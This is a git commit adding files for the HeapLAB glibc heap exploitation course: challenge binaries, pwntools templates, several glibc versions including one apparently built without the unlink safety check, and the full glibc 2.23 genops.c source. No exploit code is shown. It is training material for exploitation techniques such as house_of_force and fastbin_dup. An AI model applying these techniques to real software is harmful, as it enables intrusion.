commit ba02c1bd6981675aaf5a0b6cddb7457e53d5eed1
Author: Brett Weiland <techcrazybsw@gmail.com>
Date:   Mon Jan 4 16:32:01 2021 -0600

            new file:   HeapLAB+Bible.pdf
            new file:   HeapLAB/.glibc/glibc_2.23/ld-2.23.so
            new file:   HeapLAB/.glibc/glibc_2.23/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.23/libc-2.23.so
            new file:   HeapLAB/.glibc/glibc_2.23/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.23/libio/genops.c
            new file:   HeapLAB/.glibc/glibc_2.23/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld-2.23.so
            new file:   HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc-2.23.so
            new file:   HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libio/genops.c
            new file:   HeapLAB/.glibc/glibc_2.23_unsafe-unlink/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.24/ld-2.24.so
            new file:   HeapLAB/.glibc/glibc_2.24/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.24/libc-2.24.so
            new file:   HeapLAB/.glibc/glibc_2.24/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.24/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.25/ld-2.25.so
            new file:   HeapLAB/.glibc/glibc_2.25/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.25/libc-2.25.so
            new file:   HeapLAB/.glibc/glibc_2.25/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.25/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.26/ld-2.26.so
            new file:   HeapLAB/.glibc/glibc_2.26/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.26/libc-2.26.so
            new file:   HeapLAB/.glibc/glibc_2.26/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.26/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.26_no-tcache/ld-2.26.so
            new file:   HeapLAB/.glibc/glibc_2.26_no-tcache/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.26_no-tcache/libc-2.26.so
            new file:   HeapLAB/.glibc/glibc_2.26_no-tcache/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.26_no-tcache/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.27/ld-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.27/libc-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.27/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.27_no-tcache/ld-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27_no-tcache/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.27_no-tcache/libc-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27_no-tcache/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.27_no-tcache/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/ld-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/libc-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.28/ld-2.28.so
            new file:   HeapLAB/.glibc/glibc_2.28/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.28/libc-2.28.so
            new file:   HeapLAB/.glibc/glibc_2.28/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.28/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.28_no-tcache/ld-2.28.so
            new file:   HeapLAB/.glibc/glibc_2.28_no-tcache/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.28_no-tcache/libc-2.28.so
            new file:   HeapLAB/.glibc/glibc_2.28_no-tcache/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.28_no-tcache/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.29/ld-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.29/libc-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.29/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.29_no-tcache/ld-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29_no-tcache/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.29_no-tcache/libc-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29_no-tcache/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.29_no-tcache/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/ld-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/libc-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.30/ld-2.30.so
            new file:   HeapLAB/.glibc/glibc_2.30/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.30/libc-2.30.so
            new file:   HeapLAB/.glibc/glibc_2.30/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.30/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.30_no-tcache/ld-2.30.so
            new file:   HeapLAB/.glibc/glibc_2.30_no-tcache/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.30_no-tcache/libc-2.30.so
            new file:   HeapLAB/.glibc/glibc_2.30_no-tcache/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.30_no-tcache/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.31/ld-2.31.so
            new file:   HeapLAB/.glibc/glibc_2.31/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.31/libc-2.31.so
            new file:   HeapLAB/.glibc/glibc_2.31/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.31/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.31_no-tcache/ld-2.31.so
            new file:   HeapLAB/.glibc/glibc_2.31_no-tcache/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.31_no-tcache/libc-2.31.so
            new file:   HeapLAB/.glibc/glibc_2.31_no-tcache/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.31_no-tcache/malloc/malloc.c
            new file:   HeapLAB/.src/demo_fastbins.c
            new file:   HeapLAB/.src/demo_top_chunk.c
            new file:   HeapLAB/.src/demo_unsortedbin.c
            new file:   HeapLAB/HeapLab - GLIBC Heap Exploitation.pdf
            new file:   HeapLAB/challenge-fastbin_dup/.gdb_history
            new file:   HeapLAB/challenge-fastbin_dup/bruh.py
            new file:   HeapLAB/challenge-fastbin_dup/fastbin_dup_2
            new file:   HeapLAB/challenge-fastbin_dup/pwntools_template.py
            new file:   HeapLAB/challenge-one_byte/one_byte
            new file:   HeapLAB/challenge-one_byte/pwntools_template.py
            new file:   HeapLAB/fastbin_dup/demo
            new file:   HeapLAB/fastbin_dup/fastbin_dup
            new file:   HeapLAB/fastbin_dup/pwntools_template.py
            new file:   HeapLAB/house_of_force/demo
            new file:   HeapLAB/house_of_force/house_of_force
            new file:   HeapLAB/house_of_force/pwntools_template.py
            new file:   HeapLAB/house_of_orange/house_of_orange
            new file:   HeapLAB/house_of_orange/pwntools_template.py
            new file:   HeapLAB/malloc_testbed/.links/ld.so.2
            new file:   HeapLAB/malloc_testbed/.links/libc.so.6
            new file:   HeapLAB/malloc_testbed/change_glibc_version.py
            new file:   HeapLAB/malloc_testbed/malloc_testbed
            new file:   HeapLAB/malloc_testbed/pwntools_template.py
            new file:   HeapLAB/safe_unlink/pwntools_template.py
            new file:   HeapLAB/safe_unlink/safe_unlink
            new file:   HeapLAB/unsafe_unlink/demo
            new file:   HeapLAB/unsafe_unlink/pwntools_template.py
            new file:   HeapLAB/unsafe_unlink/unsafe_unlink
            new file:   original.gz

diff --git a/HeapLAB+Bible.pdf b/HeapLAB+Bible.pdf
new file mode 100644
index 0000000..c2b6381
Binary files /dev/null and b/HeapLAB+Bible.pdf differ
diff --git a/HeapLAB/.glibc/glibc_2.23/ld-2.23.so b/HeapLAB/.glibc/glibc_2.23/ld-2.23.so
new file mode 100755
index 0000000..dab711f
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.23/ld-2.23.so differ
diff --git a/HeapLAB/.glibc/glibc_2.23/ld.so.2 b/HeapLAB/.glibc/glibc_2.23/ld.so.2
new file mode 120000
index 0000000..6a23928
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23/ld.so.2
@@ -0,0 +1 @@
+ld-2.23.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.23/libc-2.23.so b/HeapLAB/.glibc/glibc_2.23/libc-2.23.so
new file mode 100755
index 0000000..f6e2889
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.23/libc-2.23.so differ
diff --git a/HeapLAB/.glibc/glibc_2.23/libc.so.6 b/HeapLAB/.glibc/glibc_2.23/libc.so.6
new file mode 120000
index 0000000..a42d666
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23/libc.so.6
@@ -0,0 +1 @@
+libc-2.23.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.23/libio/genops.c b/HeapLAB/.glibc/glibc_2.23/libio/genops.c
new file mode 100644
index 0000000..5803cbf
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23/libio/genops.c
@@ -0,0 +1,1253 @@
+/* Copyright (C) 1993-2016 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public
+   License as published by the Free Software Foundation; either
+   version 2.1 of the License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; if not, see
+   <http://www.gnu.org/licenses/>.
+
+   As a special exception, if you link the code in this file with
+   files compiled with a GNU compiler to produce an executable,
+   that does not cause the resulting executable to be covered by
+   the GNU Lesser General Public License.  This exception does not
+   however invalidate any other reasons why the executable file
+   might be covered by the GNU Lesser General Public License.
+   This exception applies to code released by its copyright holders
+   in files containing the exception.  */
+
+/* Generic or default I/O operations. */
+
+#include "libioP.h"
+#include <stdlib.h>
+#include <string.h>
+#include <stdbool.h>
+#ifdef _LIBC
+#include <sched.h>
+#endif
+
+#ifdef _IO_MTSAFE_IO
+static _IO_lock_t list_all_lock = _IO_lock_initializer;
+#endif
+
+/* Used to signal modifications to the list of FILE descriptors.  */
+static int _IO_list_all_stamp;
+
+
+static _IO_FILE *run_fp;
+
+#ifdef _IO_MTSAFE_IO
+static void
+flush_cleanup (void *not_used)
+{
+  if (run_fp != NULL)
+    _IO_funlockfile (run_fp);
+  _IO_lock_unlock (list_all_lock);
+}
+#endif
+
+void
+_IO_un_link (struct _IO_FILE_plus *fp)
+{
+  if (fp->file._flags & _IO_LINKED)
+    {
+      struct _IO_FILE **f;
+#ifdef _IO_MTSAFE_IO
+      _IO_cleanup_region_start_noarg (flush_cleanup);
+      _IO_lock_lock (list_all_lock);
+      run_fp = (_IO_FILE *) fp;
+      _IO_flockfile ((_IO_FILE *) fp);
+#endif
+      if (_IO_list_all == NULL)
+	;
+      else if (fp == _IO_list_all)
+	{
+	  _IO_list_all = (struct _IO_FILE_plus *) _IO_list_all->file._chain;
+	  ++_IO_list_all_stamp;
+	}
+      else
+	for (f = &_IO_list_all->file._chain; *f; f = &(*f)->_chain)
+	  if (*f == (_IO_FILE *) fp)
+	    {
+	      *f = fp->file._chain;
+	      ++_IO_list_all_stamp;
+	      break;
+	    }
+      fp->file._flags &= ~_IO_LINKED;
+#ifdef _IO_MTSAFE_IO
+      _IO_funlockfile ((_IO_FILE *) fp);
+      run_fp = NULL;
+      _IO_lock_unlock (list_all_lock);
+      _IO_cleanup_region_end (0);
+#endif
+    }
+}
+libc_hidden_def (_IO_un_link)
+
+void
+_IO_link_in (struct _IO_FILE_plus *fp)
+{
+  if ((fp->file._flags & _IO_LINKED) == 0)
+    {
+      fp->file._flags |= _IO_LINKED;
+#ifdef _IO_MTSAFE_IO
+      _IO_cleanup_region_start_noarg (flush_cleanup);
+      _IO_lock_lock (list_all_lock);
+      run_fp = (_IO_FILE *) fp;
+      _IO_flockfile ((_IO_FILE *) fp);
+#endif
+      fp->file._chain = (_IO_FILE *) _IO_list_all;
+      _IO_list_all = fp;
+      ++_IO_list_all_stamp;
+#ifdef _IO_MTSAFE_IO
+      _IO_funlockfile ((_IO_FILE *) fp);
+      run_fp = NULL;
+      _IO_lock_unlock (list_all_lock);
+      _IO_cleanup_region_end (0);
+#endif
+    }
+}
+libc_hidden_def (_IO_link_in)
+
+/* Return minimum _pos markers
+   Assumes the current get area is the main get area. */
+_IO_ssize_t _IO_least_marker (_IO_FILE *fp, char *end_p);
+
+_IO_ssize_t
+_IO_least_marker (_IO_FILE *fp, char *end_p)
+{
+  _IO_ssize_t least_so_far = end_p - fp->_IO_read_base;
+  struct _IO_marker *mark;
+  for (mark = fp->_markers; mark != NULL; mark = mark->_next)
+    if (mark->_pos < least_so_far)
+      least_so_far = mark->_pos;
+  return least_so_far;
+}
+
+/* Switch current get area from backup buffer to (start of) main get area. */
+
+void
+_IO_switch_to_main_get_area (_IO_FILE *fp)
+{
+  char *tmp;
+  fp->_flags &= ~_IO_IN_BACKUP;
+  /* Swap _IO_read_end and _IO_save_end. */
+  tmp = fp->_IO_read_end;
+  fp->_IO_read_end = fp->_IO_save_end;
+  fp->_IO_save_end = tmp;
+  /* Swap _IO_read_base and _IO_save_base. */
+  tmp = fp->_IO_read_base;
+  fp->_IO_read_base = fp->_IO_save_base;
+  fp->_IO_save_base = tmp;
+  /* Set _IO_read_ptr. */
+  fp->_IO_read_ptr = fp->_IO_read_base;
+}
+
+/* Switch current get area from main get area to (end of) backup area. */
+
+void
+_IO_switch_to_backup_area (_IO_FILE *fp)
+{
+  char *tmp;
+  fp->_flags |= _IO_IN_BACKUP;
+  /* Swap _IO_read_end and _IO_save_end. */
+  tmp = fp->_IO_read_end;
+  fp->_IO_read_end = fp->_IO_save_end;
+  fp->_IO_save_end = tmp;
+  /* Swap _IO_read_base and _IO_save_base. */
+  tmp = fp->_IO_read_base;
+  fp->_IO_read_base = fp->_IO_save_base;
+  fp->_IO_save_base = tmp;
+  /* Set _IO_read_ptr.  */
+  fp->_IO_read_ptr = fp->_IO_read_end;
+}
+
+int
+_IO_switch_to_get_mode (_IO_FILE *fp)
+{
+  if (fp->_IO_write_ptr > fp->_IO_write_base)
+    if (_IO_OVERFLOW (fp, EOF) == EOF)
+      return EOF;
+  if (_IO_in_backup (fp))
+    fp->_IO_read_base = fp->_IO_backup_base;
+  else
+    {
+      fp->_IO_read_base = fp->_IO_buf_base;
+      if (fp->_IO_write_ptr > fp->_IO_read_end)
+	fp->_IO_read_end = fp->_IO_write_ptr;
+    }
+  fp->_IO_read_ptr = fp->_IO_write_ptr;
+
+  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = fp->_IO_read_ptr;
+
+  fp->_flags &= ~_IO_CURRENTLY_PUTTING;
+  return 0;
+}
+libc_hidden_def (_IO_switch_to_get_mode)
+
+void
+_IO_free_backup_area (_IO_FILE *fp)
+{
+  if (_IO_in_backup (fp))
+    _IO_switch_to_main_get_area (fp);  /* Just in case. */
+  free (fp->_IO_save_base);
+  fp->_IO_save_base = NULL;
+  fp->_IO_save_end = NULL;
+  fp->_IO_backup_base = NULL;
+}
+libc_hidden_def (_IO_free_backup_area)
+
+#if 0
+int
+_IO_switch_to_put_mode (_IO_FILE *fp)
+{
+  fp->_IO_write_base = fp->_IO_read_ptr;
+  fp->_IO_write_ptr = fp->_IO_read_ptr;
+  /* Following is wrong if line- or un-buffered? */
+  fp->_IO_write_end = (fp->_flags & _IO_IN_BACKUP
+		       ? fp->_IO_read_end : fp->_IO_buf_end);
+
+  fp->_IO_read_ptr = fp->_IO_read_end;
+  fp->_IO_read_base = fp->_IO_read_end;
+
+  fp->_flags |= _IO_CURRENTLY_PUTTING;
+  return 0;
+}
+#endif
+
+int
+__overflow (_IO_FILE *f, int ch)
+{
+  /* This is a single-byte stream.  */
+  if (f->_mode == 0)
+    _IO_fwide (f, -1);
+  return _IO_OVERFLOW (f, ch);
+}
+libc_hidden_def (__overflow)
+
+static int save_for_backup (_IO_FILE *fp, char *end_p)
+#ifdef _LIBC
+     internal_function
+#endif
+     ;
+
+static int
+#ifdef _LIBC
+internal_function
+#endif
+save_for_backup (_IO_FILE *fp, char *end_p)
+{
+  /* Append [_IO_read_base..end_p] to backup area. */
+  _IO_ssize_t least_mark = _IO_least_marker (fp, end_p);
+  /* needed_size is how much space we need in the backup area. */
+  _IO_size_t needed_size = (end_p - fp->_IO_read_base) - least_mark;
+  /* FIXME: Dubious arithmetic if pointers are NULL */
+  _IO_size_t current_Bsize = fp->_IO_save_end - fp->_IO_save_base;
+  _IO_size_t avail; /* Extra space available for future expansion. */
+  _IO_ssize_t delta;
+  struct _IO_marker *mark;
+  if (needed_size > current_Bsize)
+    {
+      char *new_buffer;
+      avail = 100;
+      new_buffer = (char *) malloc (avail + needed_size);
+      if (new_buffer == NULL)
+	return EOF;		/* FIXME */
+      if (least_mark < 0)
+	{
+#ifdef _LIBC
+	  __mempcpy (__mempcpy (new_buffer + avail,
+				fp->_IO_save_end + least_mark,
+				-least_mark),
+		     fp->_IO_read_base,
+		     end_p - fp->_IO_read_base);
+#else
+	  memcpy (new_buffer + avail,
+		  fp->_IO_save_end + least_mark,
+		  -least_mark);
+	  memcpy (new_buffer + avail - least_mark,
+		  fp->_IO_read_base,
+		  end_p - fp->_IO_read_base);
+#endif
+	}
+      else
+	memcpy (new_buffer + avail,
+		fp->_IO_read_base + least_mark,
+		needed_size);
+      free (fp->_IO_save_base);
+      fp->_IO_save_base = new_buffer;
+      fp->_IO_save_end = new_buffer + avail + needed_size;
+    }
+  else
+    {
+      avail = current_Bsize - needed_size;
+      if (least_mark < 0)
+	{
+	  memmove (fp->_IO_save_base + avail,
+		   fp->_IO_save_end + least_mark,
+		   -least_mark);
+	  memcpy (fp->_IO_save_base + avail - least_mark,
+		  fp->_IO_read_base,
+		  end_p - fp->_IO_read_base);
+	}
+      else if (needed_size > 0)
+	memcpy (fp->_IO_save_base + avail,
+		fp->_IO_read_base + least_mark,
+		needed_size);
+    }
+  fp->_IO_backup_base = fp->_IO_save_base + avail;
+  /* Adjust all the streammarkers. */
+  delta = end_p - fp->_IO_read_base;
+  for (mark = fp->_markers; mark != NULL; mark = mark->_next)
+    mark->_pos -= delta;
+  return 0;
+}
+
+int
+__underflow (_IO_FILE *fp)
+{
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+  if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
+    return EOF;
+#endif
+
+  if (fp->_mode == 0)
+    _IO_fwide (fp, -1);
+  if (_IO_in_put_mode (fp))
+    if (_IO_switch_to_get_mode (fp) == EOF)
+      return EOF;
+  if (fp->_IO_read_ptr < fp->_IO_read_end)
+    return *(unsigned char *) fp->_IO_read_ptr;
+  if (_IO_in_backup (fp))
+    {
+      _IO_switch_to_main_get_area (fp);
+      if (fp->_IO_read_ptr < fp->_IO_read_end)
+	return *(unsigned char *) fp->_IO_read_ptr;
+    }
+  if (_IO_have_markers (fp))
+    {
+      if (save_for_backup (fp, fp->_IO_read_end))
+	return EOF;
+    }
+  else if (_IO_have_backup (fp))
+    _IO_free_backup_area (fp);
+  return _IO_UNDERFLOW (fp);
+}
+libc_hidden_def (__underflow)
+
+int
+__uflow (_IO_FILE *fp)
+{
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+  if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
+    return EOF;
+#endif
+
+  if (fp->_mode == 0)
+    _IO_fwide (fp, -1);
+  if (_IO_in_put_mode (fp))
+    if (_IO_switch_to_get_mode (fp) == EOF)
+      return EOF;
+  if (fp->_IO_read_ptr < fp->_IO_read_end)
+    return *(unsigned char *) fp->_IO_read_ptr++;
+  if (_IO_in_backup (fp))
+    {
+      _IO_switch_to_main_get_area (fp);
+      if (fp->_IO_read_ptr < fp->_IO_read_end)
+	return *(unsigned char *) fp->_IO_read_ptr++;
+    }
+  if (_IO_have_markers (fp))
+    {
+      if (save_for_backup (fp, fp->_IO_read_end))
+	return EOF;
+    }
+  else if (_IO_have_backup (fp))
+    _IO_free_backup_area (fp);
+  return _IO_UFLOW (fp);
+}
+libc_hidden_def (__uflow)
+
+void
+_IO_setb (_IO_FILE *f, char *b, char *eb, int a)
+{
+  if (f->_IO_buf_base && !(f->_flags & _IO_USER_BUF))
+    free (f->_IO_buf_base);
+  f->_IO_buf_base = b;
+  f->_IO_buf_end = eb;
+  if (a)
+    f->_flags &= ~_IO_USER_BUF;
+  else
+    f->_flags |= _IO_USER_BUF;
+}
+libc_hidden_def (_IO_setb)
+
+void
+_IO_doallocbuf (_IO_FILE *fp)
+{
+  if (fp->_IO_buf_base)
+    return;
+  if (!(fp->_flags & _IO_UNBUFFERED) || fp->_mode > 0)
+    if (_IO_DOALLOCATE (fp) != EOF)
+      return;
+  _IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
+}
+libc_hidden_def (_IO_doallocbuf)
+
+int
+_IO_default_underflow (_IO_FILE *fp)
+{
+  return EOF;
+}
+
+int
+_IO_default_uflow (_IO_FILE *fp)
+{
+  int ch = _IO_UNDERFLOW (fp);
+  if (ch == EOF)
+    return EOF;
+  return *(unsigned char *) fp->_IO_read_ptr++;
+}
+libc_hidden_def (_IO_default_uflow)
+
+_IO_size_t
+_IO_default_xsputn (_IO_FILE *f, const void *data, _IO_size_t n)
+{
+  const char *s = (char *) data;
+  _IO_size_t more = n;
+  if (more <= 0)
+    return 0;
+  for (;;)
+    {
+      /* Space available. */
+      if (f->_IO_write_ptr < f->_IO_write_end)
+	{
+	  _IO_size_t count = f->_IO_write_end - f->_IO_write_ptr;
+	  if (count > more)
+	    count = more;
+	  if (count > 20)
+	    {
+#ifdef _LIBC
+	      f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
+#else
+	      memcpy (f->_IO_write_ptr, s, count);
+	      f->_IO_write_ptr += count;
+#endif
+	      s += count;
+	    }
+	  else if (count)
+	    {
+	      char *p = f->_IO_write_ptr;
+	      _IO_ssize_t i;
+	      for (i = count; --i >= 0; )
+		*p++ = *s++;
+	      f->_IO_write_ptr = p;
+	    }
+	  more -= count;
+	}
+      if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
+	break;
+      more--;
+    }
+  return n - more;
+}
+libc_hidden_def (_IO_default_xsputn)
+
+_IO_size_t
+_IO_sgetn (_IO_FILE *fp, void *data, _IO_size_t n)
+{
+  /* FIXME handle putback buffer here! */
+  return _IO_XSGETN (fp, data, n);
+}
+libc_hidden_def (_IO_sgetn)
+
+_IO_size_t
+_IO_default_xsgetn (_IO_FILE *fp, void *data, _IO_size_t n)
+{
+  _IO_size_t more = n;
+  char *s = (char*) data;
+  for (;;)
+    {
+      /* Data available. */
+      if (fp->_IO_read_ptr < fp->_IO_read_end)
+	{
+	  _IO_size_t count = fp->_IO_read_end - fp->_IO_read_ptr;
+	  if (count > more)
+	    count = more;
+	  if (count > 20)
+	    {
+#ifdef _LIBC
+	      s = __mempcpy (s, fp->_IO_read_ptr, count);
+#else
+	      memcpy (s, fp->_IO_read_ptr, count);
+	      s += count;
+#endif
+	      fp->_IO_read_ptr += count;
+	    }
+	  else if (count)
+	    {
+	      char *p = fp->_IO_read_ptr;
+	      int i = (int) count;
+	      while (--i >= 0)
+		*s++ = *p++;
+	      fp->_IO_read_ptr = p;
+	    }
+	    more -= count;
+	}
+      if (more == 0 || __underflow (fp) == EOF)
+	break;
+    }
+  return n - more;
+}
+libc_hidden_def (_IO_default_xsgetn)
+
+#if 0
+/* Seems not to be needed. --drepper */
+int
+_IO_sync (_IO_FILE *fp)
+{
+  return 0;
+}
+#endif
+
+_IO_FILE *
+_IO_default_setbuf (_IO_FILE *fp, char *p, _IO_ssize_t len)
+{
+    if (_IO_SYNC (fp) == EOF)
+	return NULL;
+    if (p == NULL || len == 0)
+      {
+	fp->_flags |= _IO_UNBUFFERED;
+	_IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
+      }
+    else
+      {
+	fp->_flags &= ~_IO_UNBUFFERED;
+	_IO_setb (fp, p, p+len, 0);
+      }
+    fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = 0;
+    fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_read_end = 0;
+    return fp;
+}
+
+_IO_off64_t
+_IO_default_seekpos (_IO_FILE *fp, _IO_off64_t pos, int mode)
+{
+  return _IO_SEEKOFF (fp, pos, 0, mode);
+}
+
+int
+_IO_default_doallocate (_IO_FILE *fp)
+{
+  char *buf;
+
+  buf = malloc(_IO_BUFSIZ);
+  if (__glibc_unlikely (buf == NULL))
+    return EOF;
+
+  _IO_setb (fp, buf, buf+_IO_BUFSIZ, 1);
+  return 1;
+}
+libc_hidden_def (_IO_default_doallocate)
+
+void
+_IO_init (_IO_FILE *fp, int flags)
+{
+  _IO_no_init (fp, flags, -1, NULL, NULL);
+}
+libc_hidden_def (_IO_init)
+
+void
+_IO_old_init (_IO_FILE *fp, int flags)
+{
+  fp->_flags = _IO_MAGIC|flags;
+  fp->_flags2 = 0;
+  fp->_IO_buf_base = NULL;
+  fp->_IO_buf_end = NULL;
+  fp->_IO_read_base = NULL;
+  fp->_IO_read_ptr = NULL;
+  fp->_IO_read_end = NULL;
+  fp->_IO_write_base = NULL;
+  fp->_IO_write_ptr = NULL;
+  fp->_IO_write_end = NULL;
+  fp->_chain = NULL; /* Not necessary. */
+
+  fp->_IO_save_base = NULL;
+  fp->_IO_backup_base = NULL;
+  fp->_IO_save_end = NULL;
+  fp->_markers = NULL;
+  fp->_cur_column = 0;
+#if _IO_JUMPS_OFFSET
+  fp->_vtable_offset = 0;
+#endif
+#ifdef _IO_MTSAFE_IO
+  if (fp->_lock != NULL)
+    _IO_lock_init (*fp->_lock);
+#endif
+}
+
+void
+_IO_no_init (_IO_FILE *fp, int flags, int orientation,
+	     struct _IO_wide_data *wd, const struct _IO_jump_t *jmp)
+{
+  _IO_old_init (fp, flags);
+  fp->_mode = orientation;
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+  if (orientation >= 0)
+    {
+      fp->_wide_data = wd;
+      fp->_wide_data->_IO_buf_base = NULL;
+      fp->_wide_data->_IO_buf_end = NULL;
+      fp->_wide_data->_IO_read_base = NULL;
+      fp->_wide_data->_IO_read_ptr = NULL;
+      fp->_wide_data->_IO_read_end = NULL;
+      fp->_wide_data->_IO_write_base = NULL;
+      fp->_wide_data->_IO_write_ptr = NULL;
+      fp->_wide_data->_IO_write_end = NULL;
+      fp->_wide_data->_IO_save_base = NULL;
+      fp->_wide_data->_IO_backup_base = NULL;
+      fp->_wide_data->_IO_save_end = NULL;
+
+      fp->_wide_data->_wide_vtable = jmp;
+    }
+  else
+    /* Cause predictable crash when a wide function is called on a byte
+       stream.  */
+    fp->_wide_data = (struct _IO_wide_data *) -1L;
+#endif
+  fp->_freeres_list = NULL;
+}
+
+int
+_IO_default_sync (_IO_FILE *fp)
+{
+  return 0;
+}
+
+/* The way the C++ classes are mapped into the C functions in the
+   current implementation, this function can get called twice! */
+
+void
+_IO_default_finish (_IO_FILE *fp, int dummy)
+{
+  struct _IO_marker *mark;
+  if (fp->_IO_buf_base && !(fp->_flags & _IO_USER_BUF))
+    {
+      free (fp->_IO_buf_base);
+      fp->_IO_buf_base = fp->_IO_buf_end = NULL;
+    }
+
+  for (mark = fp->_markers; mark != NULL; mark = mark->_next)
+    mark->_sbuf = NULL;
+
+  if (fp->_IO_save_base)
+    {
+      free (fp->_IO_save_base);
+      fp->_IO_save_base = NULL;
+    }
+
+  _IO_un_link ((struct _IO_FILE_plus *) fp);
+
+#ifdef _IO_MTSAFE_IO
+  if (fp->_lock != NULL)
+    _IO_lock_fini (*fp->_lock);
+#endif
+}
+libc_hidden_def (_IO_default_finish)
+
+_IO_off64_t
+_IO_default_seekoff (_IO_FILE *fp, _IO_off64_t offset, int dir, int mode)
+{
+  return _IO_pos_BAD;
+}
+
+int
+_IO_sputbackc (_IO_FILE *fp, int c)
+{
+  int result;
+
+  if (fp->_IO_read_ptr > fp->_IO_read_base
+      && (unsigned char)fp->_IO_read_ptr[-1] == (unsigned char)c)
+    {
+      fp->_IO_read_ptr--;
+      result = (unsigned char) c;
+    }
+  else
+    result = _IO_PBACKFAIL (fp, c);
+
